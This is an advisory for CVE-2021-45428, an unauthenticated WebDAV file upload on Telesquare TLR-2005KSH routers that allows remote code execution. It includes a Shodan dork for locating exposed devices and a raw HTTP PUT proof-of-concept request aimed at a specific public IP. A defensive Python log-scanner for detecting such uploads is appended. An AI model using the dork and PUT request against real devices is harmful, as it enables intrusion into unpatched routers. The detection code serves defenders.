# Exploit Title: TLR-2005KSH - Arbitrary File Upload
# Date: 2022-05-11
# Shodan Dork: title:"Login to TLR-2021"
# Exploit Author: Ahmed Alroky
# Author Company : Aiactive
# Version: 1.0.0
# Vendor home page : http://telesquare.co.kr/
# Authentication Required: No
# Tested on: Windows
# CVE: CVE-2021-45428

# Vulnerability Description
# Because WebDAV (Web Distributed Authoring and Versioning) is enabled
# on the remote server, Telesquare TLR-2021 allows unauthorized users to upload
# any file (e.g. asp, aspx, cfm, html, jhtml, jsp, shtml), which leads to
# remote code execution as well.
# With WebDAV enabled, an arbitrary file can be uploaded
# using the PUT method.

# Proof-of-Concept
# Request
PUT /l6f3jd6cbf.txt HTTP/1.1
Host: 223.62.114.233:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Connection: close
Content-Length: 10
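
# Added example (not part of the original advisory or any vendor code): a log check
# for the condition described above, i.e. PUT requests the server accepted without
# credentials. The Common Log Format layout, the function name and the sample lines
# (documentation-range addresses) are assumptions made for this example.

```python
import re

# Extensions the advisory lists as uploadable via WebDAV PUT.
RISKY_EXT = {"asp", "aspx", "cfm", "html", "jhtml", "jsp", "shtml"}

# Assumed layout: Common/Combined Log Format access log.
LINE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines, not captured from a real device.
SAMPLE_LOG = [
    '198.51.100.7 - - [11/May/2022:10:00:01 +0000] "PUT /probe1.txt HTTP/1.1" 201 0',
    '198.51.100.7 - - [11/May/2022:10:00:05 +0000] "PUT /up.jsp HTTP/1.1" 201 0',
    '198.51.100.7 - - [11/May/2022:10:00:09 +0000] "GET /up.jsp HTTP/1.1" 200 12',
    '192.0.2.10 - admin [11/May/2022:10:01:00 +0000] "PUT /cfg.html HTTP/1.1" 204 0',
    '192.0.2.20 - - [11/May/2022:10:02:00 +0000] "PUT /x.asp HTTP/1.1" 405 0',
    '192.0.2.30 - - [11/May/2022:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 512',
]

def find_unauth_uploads(lines):
    """Return one finding per PUT that succeeded with no authenticated user."""
    findings, by_path = [], {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        path = m["path"].split("?", 1)[0]
        ext = path.rsplit(".", 1)[-1].lower() if "." in path else ""
        ok = m["status"] in {"200", "201", "204"}
        if m["method"] == "PUT" and ok and m["user"] == "-":
            finding = {"path": path, "ip": m["ip"], "ts": m["ts"],
                       "risky_ext": ext in RISKY_EXT, "fetched": False}
            by_path[path] = finding
            findings.append(finding)
        elif m["method"] in {"GET", "POST"} and ok and path in by_path:
            # The uploaded file was requested afterwards: highest priority.
            by_path[path]["fetched"] = True
    return findings

if __name__ == "__main__":
    for f in find_unauth_uploads(SAMPLE_LOG):
        print(f)
```

# Findings with both risky_ext and fetched set deserve review first; any accepted
# unauthenticated PUT indicates WebDAV write access that should be disabled.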